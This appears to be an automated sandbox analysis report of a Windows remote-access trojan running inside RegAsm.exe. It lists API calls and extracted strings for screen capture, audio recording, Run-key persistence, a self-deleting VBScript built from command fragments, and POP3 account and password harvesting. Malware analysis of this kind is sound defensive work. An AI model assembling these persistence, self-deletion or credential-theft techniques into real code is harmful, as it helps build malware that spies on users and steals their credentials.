                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                          • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                          • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                          • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                          • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                          • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                          APIs
                                                            • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                          • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                          • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                          • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                          • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                          • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                          • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                          • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                          • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                          • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                            • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                          • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                          • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                          • DeleteObject.GDI32(00000000), ref: 00418F30
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                          • DeleteDC.GDI32(00000000), ref: 00418F62
                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                          • GetCursorInfo.USER32(?), ref: 00418FA7
                                                          • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                          • DeleteObject.GDI32(?), ref: 00418FEC
                                                          • DeleteObject.GDI32(?), ref: 00418FF9
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                          • DeleteDC.GDI32(?), ref: 0041917C
                                                          • DeleteDC.GDI32(00000000), ref: 0041917F
                                                          • DeleteObject.GDI32(00000000), ref: 00419182
                                                          • GlobalFree.KERNEL32(?), ref: 0041918D
                                                          • DeleteObject.GDI32(00000000), ref: 00419241
                                                          • GlobalFree.KERNEL32(?), ref: 00419248
                                                          • DeleteDC.GDI32(?), ref: 00419258
                                                          • DeleteDC.GDI32(00000000), ref: 00419263
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 4256916514-865373369
                                                          • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                          • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                          • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                          • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                          • ExitProcess.KERNEL32 ref: 0040D7D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-332907002
                                                          • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                          • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                          • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                          • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CC58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                          • ExitProcess.KERNEL32 ref: 0040D419
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-2557013105
                                                          • Opcode ID: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                                                          • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                          • Opcode Fuzzy Hash: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                                                          • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                          • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                          • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                          • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                          • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                          • Sleep.KERNEL32(000001F4), ref: 00412682
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                          • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                          • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                          • API String ID: 2649220323-436679193
                                                          • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                          • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                          • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                          • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                          • SetEvent.KERNEL32 ref: 0041B219
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                          • CloseHandle.KERNEL32 ref: 0041B23A
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                          • API String ID: 738084811-2094122233
                                                          • Opcode ID: 9446444cf830fc6be835005bb32dda33b6c94807cab4868e8ff28011ff8f99e5
                                                          • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                          • Opcode Fuzzy Hash: 9446444cf830fc6be835005bb32dda33b6c94807cab4868e8ff28011ff8f99e5
                                                          • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                          • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                          • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                          • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-255920310
                                                          • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                          • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                          • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                          • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                          APIs
                                                            • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                            • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                            • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                          • _strlen.LIBCMT ref: 10001855
                                                          • _strlen.LIBCMT ref: 10001869
                                                          • _strlen.LIBCMT ref: 1000188B
                                                          • _strlen.LIBCMT ref: 100018AE
                                                          • _strlen.LIBCMT ref: 100018C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen$File$CopyCreateDelete
                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                          • API String ID: 3296212668-3023110444
                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040CE07
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                          • _wcslen.LIBCMT ref: 0040CEE6
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
